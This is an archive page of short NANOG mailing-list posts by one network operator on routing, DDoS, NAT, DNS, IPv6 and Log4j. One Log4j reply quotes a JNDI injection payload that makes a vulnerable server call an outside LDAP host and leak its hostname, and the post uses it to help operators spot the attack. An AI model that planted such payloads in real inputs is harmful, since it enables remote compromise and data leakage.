RE: Ingress filtering on transits, peers, and IX ports

2020-10-15 Thread Jean St-Laurent via NANOG
Hi Brian, "However, I recognized a SP-specific case where we could receive legitimate traffic sourcing from our own IP blocks: customers running multi-homed BGP where we have assigned PA space to them. So I added "permit" statements for traffic sourcing from these blocks." If your customers

RE: Ingress filtering on transits, peers, and IX ports

2020-10-13 Thread Jean St-Laurent via NANOG
That’s an interesting suggestion. There are 2 modes for uRPF: loose and strict. Which one would you recommend in this scenario and why? There are many ways to solve this and definitely uRPF is one layer of defense. But, probably not the best alone. I advocate a 3-layer approach.

RE: Linux router network cards

2020-10-23 Thread Jean St-Laurent via NANOG
-2600v3/4 or newer and faster the clocks, the better. Similar CPU core allocations if you choose TNSR. On Thu, Oct 22, 2020 at 3:21 PM Jean St-Laurent via NANOG mailto:nanog@nanog.org> > wrote: Chelsio cards are probably what you are looking for. https://www.chelsio.com/terminator-

RE: Linux router network cards

2020-10-22 Thread Jean St-Laurent via NANOG
Chelsio cards are probably what you are looking for. https://www.chelsio.com/terminator-6-asic/ It's closer to an ASIC than a traditional NIC as the router/firewall rules are pushed directly into the hardware. I don't know how good they are with Linux, but they seem to be compatible.

Nice work Ron

2021-01-21 Thread Jean St-Laurent via NANOG
https://krebsonsecurity.com/2021/01/ddos-guard-to-forfeit-internet-space-occupied-by-parler/ Jean St-Laurent CISSP #634103 ddosTest me security inc tel:438 806-9800 site:

RE: Nice work Ron

2021-01-21 Thread Jean St-Laurent via NANOG
On Behalf Of Jean St-Laurent via NANOG Sent: January 21, 2021 12:17 PM To: 'NANOG' Subject: Nice work Ron https://krebsonsecurity.com/2021/01/ddos-guard-to-forfeit-internet-space-occupied-by-parler/ Jean St-Laurent CISSP #634103 ddosTest me security inc tel:438 806-9800

RE: DDOS-Guard [was: Parler]

2021-01-29 Thread Jean St-Laurent via NANOG
This one ended up in Junk. I guess you pasted too many domain names with "Junk" behaviours. I removed the domain names from this reply. Interesting list though. Thanks for sharing. Did anyone else get that in their junk? Jean St-Laurent CISSP #634103 ddosTest me security inc site:

RE: MIB Browser Recommendation

2021-01-27 Thread Jean St-Laurent via NANOG
Wasn't there a nice one called Luna or something like that? After Net-SNMP, it was my favorite. I can't find it anymore though. Jean -Original Message- From: NANOG On Behalf Of Wes Hardaker Sent: January 27, 2021 3:12 PM To: Graham Johnston Cc: nanog@nanog.org Subject: Re: MIB

RE: RTBH and Flowspec Measurements - Stop guessing when the attack will over

2021-02-03 Thread Jean St-Laurent via NANOG
Interesting. Do I read it right that there is no workaround, but the solution is to upgrade to an updated version which includes the fix? The solution is just above the workaround, from the same page posted. https://kb.juniper.net/InfoCenter/index?page=content

RE: amazon.com multiple SPF records

2021-06-07 Thread Jean St-Laurent via NANOG
records On 2021-06-07 1:17 p.m., Jean St-Laurent via NANOG wrote: What is spf2.0/pra ? Is this new? This is the old (now widely abandoned/deprecated) Sender ID standard. ~ Matt

RE: amazon.com multiple SPF records

2021-06-07 Thread Jean St-Laurent via NANOG
What is spf2.0/pra ? Is this new? Jean From: NANOG On Behalf Of Alec Peterson Sent: June 7, 2021 10:35 AM To: Brad Barnett Cc: nanog@nanog.org Subject: Re: amazon.com multiple SPF records Hmm, are you sure? [ec2-user@ip-10-0-0-50 ~]$ dig amazon.com txt

RE: BCP38 on public-facing Ubuntu servers

2021-06-09 Thread Jean St-Laurent via NANOG
Bingo! With the -t raw, you can bypass the 1.2 Mpps limitation in iptables per CPU socket, because it's doing a very early drop without crossing the full iptables kernel modules. You can reach close to wirespeed with the -t raw compared to using the same iptables without -t raw. Jean

RE: NAT devices not translating privileged ports

2021-06-10 Thread Jean St-Laurent via NANOG
s that don't follow this behaviour, right? Jean -Original Message- From: Fernando Gont Sent: June 10, 2021 7:09 AM To: j...@ddostest.me; nanog@nanog.org Subject: Re: NAT devices not translating privileged ports Hi, Jean, On Thu, 2021-06-10 at 06:54 -0400, Jean St-Laurent via NANOG

RE: NAT devices not translating privileged ports

2021-06-10 Thread Jean St-Laurent via NANOG
Hi Fernando, NTP sounds simple but it could be very complex when you dig deep down and/or get lost in details. Here are 2 things to consider: 1. NTP clients can query NTP servers by using SRC UDP ports > 1024. 2. NTP servers cannot query/sync/communicate to another NTP server when using SRC

RE: Can somebody explain these ransomwear attacks?

2021-06-25 Thread Jean St-Laurent via NANOG
Here are some facts showing that it’s important not to pay them. 80% of ransomware victims suffer repeat attacks, according to new report https://www.cbsnews.com/news/ransomware-victims-suffer-repeat-attacks-new-report/ published June 17th 2021 Don’t pay them. Just clean your mess.

RE: Can somebody explain these ransomwear attacks?

2021-06-25 Thread Jean St-Laurent via NANOG
Hi Jim, Very nice text from you and you seem to offer good hints on how to stop it long term. The reality is that the USA is going in the direct opposite direction from what you express. The payment to ransomware gangs is now tax-deductible. "Extorted by ransomware gangs? The payments may be

RE: Can somebody explain these ransomwear attacks?

2021-06-25 Thread Jean St-Laurent via NANOG
I agree with you that 100% secure is not achievable. The goal is to make your business so difficult to hack that it is no longer economically viable for terrorists to attack it in the first place. That’s the best insurance you can give to your business. Jean

RE: Juniper hardware recommendation

2021-05-17 Thread Jean St-Laurent via NANOG
Good monitoring software allows you to do "preprocessing" before storing the monitored data in a database. Saku's formula should work well in this case. I use Zabbix for monitoring big infrastructure. It has many advantages like: - Push or pull metrics (dmz friendly) - Can use many proxies (scale

RE: DDoS attack with blackmail

2021-05-21 Thread Jean St-Laurent via NANOG
I also recommend book Art of War from Sun Tzu. All the answers to your questions are in that book. Jean From: NANOG On Behalf Of Lady Benjamin Cannon of Glencoe, ASCE Sent: May 20, 2021 7:18 PM To: Baldur Norddahl Cc: NANOG Operators' Group Subject: Re: DDoS attack with blackmail

RE: DDoS attack with blackmail

2021-05-25 Thread Jean St-Laurent via NANOG
with the garbage. If you honestly believe anyone you're dealing with is involved with launching attacks you clearly have not done your research into potential partners. On Sat., May 22, 2021, 11:20 a.m. Jean St-Laurent via NANOG, mailto:nanog@nanog.org> > wrote: Some industries can’t afford that

RE: BCP38 on public-facing Ubuntu servers

2021-06-02 Thread Jean St-Laurent via NANOG
Maybe you can explore the in-kernel feature called RP filter or reverse path filter. In router gear it's called uRPF. cat /proc/sys/net/ipv4/conf/default/rp_filter There are 2 modes: loose or strict. If your server is BGP multi-homed, then you must use loose. Loose is still very powerful and

RE: NAT devices not translating privileged ports

2021-06-04 Thread Jean St-Laurent via NANOG
I believe all devices will translate privileged ports, but they won't translate to the same number on the other side. They will translate to an unprivileged port. Is that what you meant, or are there really some devices that will not translate a privileged port at all? What are you trying to

RE: DDoS attack with blackmail

2021-05-22 Thread Jean St-Laurent via NANOG
. @Baldur: do you care to share some metrics? Jean From: NANOG On Behalf Of Jean St-Laurent via NANOG Sent: May 21, 2021 10:52 AM To: 'Lady Benjamin Cannon of Glencoe, ASCE' ; 'Baldur Norddahl' Cc: 'NANOG Operators' Group' Subject: RE: DDoS attack with blackmail I also recommend book Art

RE: QUIC, Connection IDs and NAT

2021-06-01 Thread Jean St-Laurent via NANOG
The first thing that comes to mind is to check the NAT timers. By default, TCP is 86400 seconds or 24h. UDP is usually shorter at around 300 seconds or 5 minutes. This is not a standard, but it seems to be broadly accepted in the industry. I am not sure if UDP/443 should be left at 300 or

RE: QUIC, Connection IDs and NAT

2021-06-01 Thread Jean St-Laurent via NANOG
Hey Rob, quick question for you. Are you able to see the connection ID when you are forwarding the frames and doing NAT? I thought this is encrypted. Can you confirm? Thanks Jean -Original Message- From: NANOG On Behalf Of Jean St-Laurent via NANOG Sent: June 1, 2021 6:51 AM

RE: Layer 2 based anycast - Kind like GLBP - Research

2021-07-02 Thread Jean St-Laurent via NANOG
Maybe a spine and leaf architecture could work for you. You could install 1 server per leaf or more. I believe this could achieve high-availability and load-balancing at layer 2. There is a kind of layer 3 overlay, but for the hosts this is transparent and it feels like a real pure

RE: shadowserver.org

2021-06-28 Thread Jean St-Laurent via NANOG
What is the difference between shodan.io and shadowserver.org ? Jean

RE: shadowserver.org

2021-06-28 Thread Jean St-Laurent via NANOG
Great list. ShadowServer is there twice on page 7. They must be noisy. Jean -Original Message- From: NANOG On Behalf Of Hank Nussbacher Sent: June 28, 2021 2:50 PM To: nanog@nanog.org Subject: Re: shadowserver.org > What is the difference between shodan.io and shadowserver.org ?

RE: DoD IP Space

2021-04-26 Thread Jean St-Laurent via NANOG
I’d be interested in an objective recap of this thread. It seems like we could do a Netflix series for networkers about it. Would anyone like to give it a try to summarize the story back from the 80’s till today and explain what is at stake here? Thanks Jean From: NANOG On

RE: EMail server gets blocked by Microsoft

2021-04-28 Thread Jean St-Laurent via NANOG
I just unlocked ddostest.me with this tool for outlook.com, Hotmail.com, msn.com and maybe all the O365 suite. It was fixed in less than 24 hours. Thanks for the tip Jean From: NANOG On Behalf Of Mike Hammett Sent: April 28, 2021 7:52 AM To: Michael Fallen Cc: nanog@nanog.org

RE: DoD IP Space

2021-04-25 Thread Jean St-Laurent via NANOG
This is true and very interesting, but the opposite is also true. They are now reachable from probably nearly anywhere and therefore open for business. Let's see what will slowly appear in shodan.io and shadowserver.org Jean -Original Message- From: NANOG On Behalf Of William

RE: Retalitory DDoS

2021-02-08 Thread Jean St-Laurent via NANOG
You got RTBH? From: Mike Hammett Sent: February 8, 2021 12:50 PM To: Jean St-Laurent Cc: NANOG list Subject: Re: Retalitory DDoS In my case, it was against a server not on my own network, so my impact was a blackhole for an hour at 4 AM local time. I likely wouldn't have even noticed

RE: Retalitory DDoS

2021-02-08 Thread Jean St-Laurent via NANOG
I would not for 2.5 Gbps. So if you were down for 1 hour with 2.5 Gbps, it’s probably not a black hole. There might be something else valuable in this report. Maybe 2.5 Gbps is not the damaging factor here, unless your server has only a 1 Gbps NIC, then it could explain it. But, I doubt it.

RE: Retalitory DDoS

2021-02-08 Thread Jean St-Laurent via NANOG
Nice report. If you had to pick just one vector out of this “multi-vector” attack, which one seems to be the one that had the biggest effect on your network or service? Was it degraded or total service interruption? Jean From: NANOG On Behalf Of Mike Hammett Sent:

RE: [EXTERNAL] Re: Retalitory DDoS

2021-02-08 Thread Jean St-Laurent via NANOG
Good analysis, Hugo. I believe that all of this volumetric attack is just noise to hide the real attack that really killed your webserver. TCP Flag: SYN: 100% I would start with this line and I agree that Roland’s deck might have something about SYN flood. Jean From: Hugo

RE: Suspicious IP reporting

2021-02-04 Thread Jean St-Laurent via NANOG
I do not know Tom personally, but I’ve been following his comments, hindsight and shared experience. Tom seems to be a bigger player than you on this mailing list. Joe, you are only penalizing yourself by banning him. I would personally not ban him. J From: Jean St-Laurent Sent:

RE: Suspicious IP reporting

2021-02-04 Thread Jean St-Laurent via NANOG
So what? I’ve scanned the internet more than 100s of times on all ports/protocols you can imagine with zmap and many other shabby tools. I agree with Tom that these abuse reports are totally useless and create so much noise that it feels like crying wolf. Network operators are trained to

RE: wow, lots of akamai

2021-04-01 Thread Jean St-Laurent via NANOG
I remember working for a big ISP in Europe offering cable TV + internet with 20M+ subscribers. Every time there was a huge power outage in major cities, all TVs would go off at the same time. I don't have stats on power grid stability in Europe vs N/A. The problem was when the power was

RE: wow, lots of akamai

2021-04-01 Thread Jean St-Laurent via NANOG
No I didn't suggest that. -Original Message- From: NANOG On Behalf Of Niels Bakker Sent: April 1, 2021 3:21 PM To: nanog@nanog.org Subject: Re: wow, lots of akamai * nanog@nanog.org (Jean St-Laurent via NANOG) [Thu 01 Apr 2021, 21:03 CEST]: >An artificial roll out penalty some

RE: wow, lots of akamai

2021-04-01 Thread Jean St-Laurent via NANOG
@nanog.org Subject: Re: wow, lots of akamai On Thu, Apr 1, 2021 at 12:23 Niels Bakker mailto:na...@bakker.net> > wrote: * nanog@nanog.org <mailto:nanog@nanog.org> (Jean St-Laurent via NANOG) [Thu 01 Apr 2021, 21:03 CEST]: >An artificial roll out penalty somehow? Probably not at

RE: wow, lots of akamai

2021-04-01 Thread Jean St-Laurent via NANOG
April 1, 2021 2:21:24 PM Subject: Re: wow, lots of akamai * nanog@nanog.org <mailto:nanog@nanog.org> (Jean St-Laurent via NANOG) [Thu 01 Apr 2021, 21:03 CEST]: >An artificial roll out penalty somehow? Probably not at the ISP >level, but more at the game level. Well, ISP could also

RE: wow, lots of akamai

2021-04-01 Thread Jean St-Laurent via NANOG
mailto:na...@bakker.net> > wrote: * nanog@nanog.org <mailto:nanog@nanog.org> (Jean St-Laurent via NANOG) [Thu 01 Apr 2021, 21:03 CEST]: >An artificial roll out penalty somehow? Probably not at the ISP >level, but more at the game level. Well, ISP could also have some >mechanis

RE: wow, lots of akamai

2021-04-01 Thread Jean St-Laurent via NANOG
Bakker mailto:na...@bakker.net> > wrote: * nanog@nanog.org <mailto:nanog@nanog.org> (Jean St-Laurent via NANOG) [Thu 01 Apr 2021, 21:03 CEST]: >An artificial roll out penalty somehow? Probably not at the ISP >level, but more at the game level. Well, ISP could also have som

BGP and The zero window edge

2021-04-21 Thread Jean St-Laurent via NANOG
Nice article explaining a specific BGP corner case not removing routes when TCP window reaches 0. https://blog.benjojo.co.uk/post/bgp-stuck-routes-tcp-zero-window The proposed solution is a new RFC for BGP with the suggestion to introduce a new timer. Fascinating! Jean St-Laurent /CISSP

RE: Google IP Geolocation

2021-04-11 Thread Jean St-Laurent via NANOG
I was not sure what a TI-99/4a is. I thought it's a new kind of phone. Lol You got me! Jean -Original Message- From: NANOG On Behalf Of Jared Mauch Sent: April 10, 2021 7:10 PM To: Laura Smith Cc: nanog@nanog.org Subject: Re: Google IP Geolocation I've had a similar issue in the

RE: Suspicious IP reporting

2021-02-05 Thread Jean St-Laurent via NANOG
Hi Joe & Joe, I’m not sure which Joe is the original Joe anymore, but I like this reply better than the previous one. It feels more informative and more useful to the community. I just stumbled on this article.

RE: Where to get IPv4 block these day

2021-08-06 Thread Jean St-Laurent via NANOG
What is the average price per ip address for /24 with good reputation vs /24 with questionable reputation? Can you extrapolate too to /21 and /20? Jean From: NANOG On Behalf Of Tony Wicks Sent: August 5, 2021 4:08 PM To: 'NANOG' Subject: RE: Where to get IPv4 block these day

RE: uPRF strict more

2021-09-29 Thread Jean St-Laurent via NANOG
I understand better why some prefer ACL vs uRPF. For sure, forwarding 400 Gbps of 80B frames is a sign that something bad is happening. Jean -Original Message- From: brad dreisbach Sent: September 29, 2021 4:18 PM To: Jean St-Laurent Cc: 'brad dreisbach' ; 'Phil Bedard' ; 'North

RE: uPRF strict more

2021-09-29 Thread Jean St-Laurent via NANOG
Hi Brad, I'd be interested to hear more about this pps penalty. Do we talk about 5% penalty or something closer to 50%? Let me know if you still have some numbers close to you related to PPS with uRPF loose. Thanks Jean -Original Message- From: NANOG On Behalf Of brad dreisbach

RE: uPRF strict more

2021-09-29 Thread Jean St-Laurent via NANOG
Thanks a lot for sharing. So 100 Gbps at line rate with 80B frames is about ~150 Mpps. 100 Gbps at line rate with 208B frames is about ~60 Mpps. It's a significant penalty. Jean -Original Message- From: brad dreisbach Sent: September 29, 2021 3:33 PM To: Jean St-Laurent Cc: 'brad

RE: DNS pulling BGP routes?

2021-10-07 Thread Jean St-Laurent via NANOG
Something public that we know now is that it's possible to totally shut down Facebook and restart it. Can we shut down the full internet one day and see if it will restart properly without too much hacking here and there? Jean -Original Message- From: NANOG On Behalf Of Mark Tinka

RE: DNS pulling BGP routes?

2021-10-07 Thread Jean St-Laurent via NANOG
Nice document. In section 2.5 Routing, this is written: Distributing Authoritative Name Servers via Shared Unicast Addresses... organizations implementing these practices should always provide at least one authoritative server which is not a participant in any shared unicast mesh. Could

RE: DNS pulling BGP routes?

2021-10-07 Thread Jean St-Laurent via NANOG
Well said Bill. I agree with you about having all your tech/adm records + registrar on the same NS... especially for your OOB domain. Probably what killed them. They lost access to their fb-00b-net-mgmt.io cool dns name network. It just went from bad to worse when they realized that they

RE: slack.com

2021-10-02 Thread Jean St-Laurent via NANOG
Friday is always a good day to do such change. :D -Original Message- From: NANOG On Behalf Of Mark Tinka Sent: October 2, 2021 2:17 AM To: Bill Woodcock Cc: nanog@nanog.org Subject: Re: slack.com On 10/2/21 08:14, Bill Woodcock wrote: > We did not use an NTA, but we did flush our

RE: massive facebook outage presently

2021-10-04 Thread Jean St-Laurent via NANOG
The glue records for the NS are set at 48 hours. dig @c.gtld-servers.net. facebook.com. NS ;; facebook.com. 172800 IN NS a.ns.facebook.com. facebook.com. 172800 IN NS b.ns.facebook.com. facebook.com. 172800 IN NS

RE: Facebook post-mortems...

2021-10-05 Thread Jean St-Laurent via NANOG
-mortems... On Tue, Oct 5, 2021 at 5:44 AM Mark Tinka mailto:mark@tinka.africa> > wrote: On 10/5/21 14:08, Jean St-Laurent via NANOG wrote: > Maybe withdrawing those routes to their NS could have been mitigated by > having NS in separate entities. Well, doesn't really matte

RE: Facebook post-mortems...

2021-10-05 Thread Jean St-Laurent via NANOG
network reachability as almost bulletproof and that it will never disappear. Which is probably true most of the time. Until yesterday happens and the 9's in your reliability percentage change to 7's. On Tue, Oct 5, 2021 at 8:10 AM Jean St-Laurent via NANOG mailto:nanog@nanog.org> > wrote:

RE: Facebook post-mortems...

2021-10-05 Thread Jean St-Laurent via NANOG
Maybe withdrawing those routes to their NS could have been mitigated by having NS in separate entities. Let's check how these big companies are spreading their NS's. $ dig +short facebook.com NS d.ns.facebook.com. b.ns.facebook.com. c.ns.facebook.com. a.ns.facebook.com. $ dig +short google.com

RE: massive facebook outage presently

2021-10-05 Thread Jean St-Laurent via NANOG
I don't understand how this would have helped yesterday. From what is public so far, they really painted themselves into a corner with no way out. A classic, but at epic scale. They will learn and improve for sure, but I don't understand how "firmware default to your own network" would have helped

RE: Facebook post-mortems...

2021-10-05 Thread Jean St-Laurent via NANOG
different entities for DNS is not financially viable? Jean -Original Message- From: NANOG On Behalf Of Mark Tinka Sent: October 5, 2021 8:22 AM To: nanog@nanog.org Subject: Re: Facebook post-mortems... On 10/5/21 14:08, Jean St-Laurent via NANOG wrote: > Maybe withdrawing th

RE: Facebook post-mortems...

2021-10-05 Thread Jean St-Laurent via NANOG
Does anyone have info on whether this network 69.171.240.0/20 was reachable during the outage? Jean From: NANOG On Behalf Of Tom Beecher Sent: October 5, 2021 10:30 AM To: NANOG Subject: Re: Facebook post-mortems... People keep repeating this but I don't think it's true. My comment

RE: Facebook post-mortems...

2021-10-05 Thread Jean St-Laurent via NANOG
y true most of the time. Until yesterday happens and the 9's in your reliability percentage change to 7's. On Tue, Oct 5, 2021 at 8:10 AM Jean St-Laurent via NANOG mailto:nanog@nanog.org> > wrote: Maybe withdrawing those routes to their NS could have been mitigated by having NS in

RE: massive facebook outage presently

2021-10-04 Thread Jean St-Laurent via NANOG
Maybe the key to solve this issue is in an email sent to some_very_important_t...@facebook.com -Original Message- From: NANOG On Behalf Of tomocha Sent: October 4, 2021 2:32 PM To: nanog@nanog.org Subject: Re: massive facebook outage presently Hi Some of the DNS addresses are no

RE: Anyone else expereincing phone line issues from west to east ?

2021-09-27 Thread Jean St-Laurent via NANOG
It’s still ongoing? It’s been more than a week now. I thought these were resolved already. Ransomware has been down for a few months. I guess that’s why DDoS with ransom is back on the rise. Jean From: NANOG On Behalf Of Mel Beckman Sent: September 27, 2021 5:56 PM To: babydr DBA

RE: private 5G networks?

2021-12-06 Thread Jean St-Laurent via NANOG
. While at it, make sure you tell your CFO that you want it on IPv6. Jean -Original Message- From: NANOG On Behalf Of Mark Tinka Sent: December 6, 2021 7:46 AM To: nanog@nanog.org Subject: Re: private 5G networks? On 12/4/21 16:52, Jean St-Laurent via NANOG wrote: > Maybe the m

RE: private 5G networks?

2021-12-06 Thread Jean St-Laurent via NANOG
I vouch for fairness. It seems there might be a shift in how we consume services around the world. It's like a train. You can't turn 90 degrees. You need to start a smooth curve many miles ahead if you want your train to turn and reach the destination. How leaders govern will be more

RE: private 5G networks?

2021-12-06 Thread Jean St-Laurent via NANOG
You're absolutely right and I agree with your line of thought. Strangely, there is apparently a lawsuit of $150B against Meta for facilitating the Rohingya genocide. I am not sure how valid it is and where it will go, but $150B is quite something. It looks like the price a country has to pay

RE: private 5G networks?

2021-12-04 Thread Jean St-Laurent via NANOG
Maybe the main argument is: run a Pegasus-free 5G/LTE network. Mr. Bezos was hacked by that and it's probably a technical way to start protecting customers against that kind of sophisticated spyware that spreads in the normal mobile network. I might be wrong and probably Pegasus can still

RE: private 5G networks?

2021-12-06 Thread Jean St-Laurent via NANOG
more secure. I'm sure you know the answer to that. Private 5G is just a method for local spectrum allocation that does not require a full FCC license. That's it. On Mon, Dec 6, 2021 at 12:37 PM Jean St-Laurent via NANOG mailto:nanog@nanog.org> > wrote: You're absolutely right

RE: IPv6 and CDN's

2021-11-28 Thread Jean St-Laurent via NANOG
IPv6 can be shorter than IPv4. Here is the proof: ping6 ::1 is shorter than ping 127.1 IPv6 addresses can be very small when done properly. Jean -Original Message- From: NANOG On Behalf Of Mark Tinka Sent: November 28, 2021 5:39 AM To: nanog@nanog.org Subject: Re: IPv6 and CDN's

RE: IPv6 and CDN's

2021-11-28 Thread Jean St-Laurent via NANOG
I like to put some servers behind that scheme. 2601::443: for https servers 2601::25: for MTA servers. 2601::993: for IMAP It gives a quick note of what that IP is even though it’s IPv6 and usually non-human readable. Not sure what kind of scheme is used by medium/big

RE: IPv6 and CDN's

2021-11-29 Thread Jean St-Laurent via NANOG
I remember when I was a junior in a major NOC, we had this management host with a local hosts file for all critical components. Probably worth reviewing some old school techniques. If you can automate your gazillion routers business, you probably can also automate a couple of hosts

RE: IPv6 and CDN's

2021-11-26 Thread Jean St-Laurent via NANOG
With a kicking ass pitch -Original Message- From: NANOG On Behalf Of Mark Tinka Sent: November 26, 2021 5:52 AM To: nanog@nanog.org Subject: Re: IPv6 and CDN's On 11/3/21 22:13, Max Tulyev wrote: > Implementing IPv6 reduces costs for CGNAT. You will have (twice?) less > traffic flow

RE: IPv6 and CDN's

2021-11-26 Thread Jean St-Laurent via NANOG
Here are some maths and 1 argument kicking ass pitch for CFOs that use iPhones. Apple tells app devs to use IPv6 as it's 1.4 times faster than IPv4 https://www.zdnet.com/article/apple-tells-app-devs-to-use-ipv6-as-its-1-4-times-faster-than-ipv4/ Build around that maybe? Jean From:

RE: IPv6 and CDN's

2021-11-26 Thread Jean St-Laurent via NANOG
With that specific line directly from Apple: "And when IPv6 is in use, the median connection setup is 1.4 times faster than IPv4. This is primarily due to reduced NAT usage and improved routing." There it is, Improved routing. Jean From: Jean St-Laurent Sent: November 26, 2021

RE: IPv6 and CDN's

2021-11-26 Thread Jean St-Laurent via NANOG
> > wrote: On 11/26/21 1:44 PM, Jean St-Laurent via NANOG wrote: Here are some maths and 1 argument kicking ass pitch for CFO’s that use iphones. Apple tells app devs to use IPv6 as it's 1.4 times faster than IPv4 https://www.zdnet.com/article/apple-tells-app-devs-to-use-ipv6-as-its-1-4

RE: IPv6 and CDN's

2021-11-26 Thread Jean St-Laurent via NANOG
But CFOs like monetization. Was that thread about IPv6 or CFO? From: Michael Thomas Sent: November 26, 2021 7:37 PM To: Oliver O'Boyle Cc: Jean St-Laurent ; Ca By ; North American Network Operators' Group Subject: Re: IPv6 and CDN's That's a start, I guess. Before all they had was

RE: anyone use fbtracert successfully?

2021-11-25 Thread Jean St-Laurent via NANOG
smokeping in master slave mode. A bit old school, but maybe still worth a try. https://oss.oetiker.ch/smokeping/doc/smokeping_master_slave.en.html Jean From: NANOG On Behalf Of Adam Thompson Sent: November 25, 2021 1:31 PM To: Hugo Slabbert ; Thomas Scott Cc: nanog Subject: RE:

RE: possible rsync validation dos vuln

2021-10-29 Thread Jean St-Laurent via NANOG
The link doesn't work. 404 https://www.ncsc.nl/actueel/nieuws/2021/oktober/29/aanstaande-bekendm What are the specs of that possible dos vuln? Is it reflection or amplification or something else? Thanks Jean

RE: possible rsync validation dos vuln

2021-10-29 Thread Jean St-Laurent via NANOG
https://www.ncsc.nl/actueel/nieuws/2021/oktober/29/aanstaande-bekendmaking-cvd-procedure-rpki -Original Message- From: NANOG On Behalf Of Niels Bakker Sent: October 29, 2021 2:01 PM To: nanog@nanog.org Subject: Re: possible rsync validation dos vuln * nanog@nanog.org (Jean St-Laurent

RE: Anyone else seeing DNSSEC failures from EU Commission ? (european-union.europa.eu)

2021-12-09 Thread Jean St-Laurent via NANOG
I understand now and I agree with you that there’s something fishy there. Fear sells. Thanks Jean From: Ca By Sent: December 9, 2021 10:47 AM To: Jean St-Laurent Cc: Arne Jensen ; nanog@nanog.org Subject: Re: Anyone else seeing DNSSEC failures from EU Commission ?

RE: Anyone else seeing DNSSEC failures from EU Commission ? (european-union.europa.eu)

2021-12-09 Thread Jean St-Laurent via NANOG
What is a ddos death spiral? Jean From: NANOG On Behalf Of Ca By Sent: December 9, 2021 9:36 AM To: Arne Jensen Cc: nanog@nanog.org Subject: Re: Anyone else seeing DNSSEC failures from EU Commission ? (european-union.europa.eu) and you feeding the vendor / hacker ddos death spiral

RE: Latency/Packet Loss on ASR1006

2021-12-09 Thread Jean St-Laurent via NANOG
If you still need netflow to gain some visibility on what’s happening, you could check the percentage of netflow export. Usually 1/1000 is good or 0.1%. Maybe for you 1/1 000 000 could be good enough too. If 100% was used, then indeed there are some real time performance penalties.

RE: private 5G networks?

2021-12-07 Thread Jean St-Laurent via NANOG
, 2021 at 12:37 PM Jean St-Laurent via NANOG mailto:nanog@nanog.org> > wrote: You're absolutely right and I agree with your line of thought. Strangely, there is apparently a lawsuit of $150B against Meta for for facilitating Rohingya Genocide . I am not sure how valid it is and where it w

RE: Log4j mitigation

2021-12-13 Thread Jean St-Laurent via NANOG
This should translate in a query from your infected server toward an infected server controlled by a malicious hacker on port 389. x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a} Right? Jean -Original Message- From: Jörg Kost Sent: December 13, 2021

RE: Log4j mitigation

2021-12-13 Thread Jean St-Laurent via NANOG
Well if you look to the right you won't see it, but if you look to the left you will see it. Meaning, that for a successful attack to work, the infected host needs to first download a payload from ldap. And ldap runs on port 389/636. You probably can't see the log4j vulnerability in the

RE: Log4j mitigation

2021-12-13 Thread Jean St-Laurent via NANOG
mitigation It's not true. It can pull from other ports, URLs, make DNS calls, and seems to evaluate even from environment variables. It's a "virtual machine". On 13 Dec 2021, at 11:54, Jean St-Laurent via NANOG wrote: > Well if you look to the right you won't see it, but if you look to th

RE: Log4j mitigation

2021-12-13 Thread Jean St-Laurent via NANOG
What do your netflows, pflow, whatever logging system you have show on port 389, 636 in the last 4 days? If you reply nothing... I will admit my mistake here publicly. I will be happy to be wrong in your face. Jean -Original Message- From: Saku Ytti Sent: December 13, 2021 6:33 AM To:

RE: Log4j mitigation

2021-12-13 Thread Jean St-Laurent via NANOG
and panic. On Mon, 13 Dec 2021 at 13:14, Jean St-Laurent via NANOG wrote: > > You are right, but it's still a good place to start looking. > > What do you recommend? Panic? > > It won't help you. > > Jean > > -Original Message- > From: Jörg Kost > Sent:

RE: Log4j mitigation

2021-12-13 Thread Jean St-Laurent via NANOG
I agree. As an example that backs what you're saying, I pasted the IP provided by Jörg in my browser. http://45.83.64.1/ Here is the html page returned. ... Research Scanning Project This is a scanner of a research scanning project. If you want to exclude your IPs from scans, please send an

RE: Log4j mitigation

2021-12-13 Thread Jean St-Laurent via NANOG
Indeed, it is very widely used. This new threat seems to behave like a worm. What was the last worm-like virus? I recall SQL Slammer or something like that in the early 2000s. Was there any other very popular worm between 2003 and now? Thanks Jean From: NANOG On Behalf Of Alain

RE: [EXTERNAL] Re: Flow collection and analysis

2022-01-28 Thread Jean St-Laurent via NANOG
Why is DNS still travelling in clear text? The software running the DNS services worldwide is probably written in C or any of the languages you mentioned below. Why don't they just strap a libressl on DNS or NanoSSL? Okay, there is DNS over https. I don't know the stats, but I doubt it's close to

RE: Cloudflare Abuse Contact

2022-01-07 Thread Jean St-Laurent via NANOG
Cloudflare might be able to help, but a dns flood might be spoofed. It's possible that Cloudflare is not the one sending you that junk. Is it a UDP DNS flood or is it some kind of DNS over TCP/Https? Jean > On 1/7/2022 11:06 AM, Mike Hale wrote: the issue we're seeing (a massive DNS flood).

RE: Flow collection and analysis

2022-01-25 Thread Jean St-Laurent via NANOG
I agree with you. The tool doesn’t really matter. Windows, linux, cloud or not. It’s really important to first understand what you are trying to solve or improve. If this step is forgotten, then it will just be another tool to support to add to your long list of useless tools. My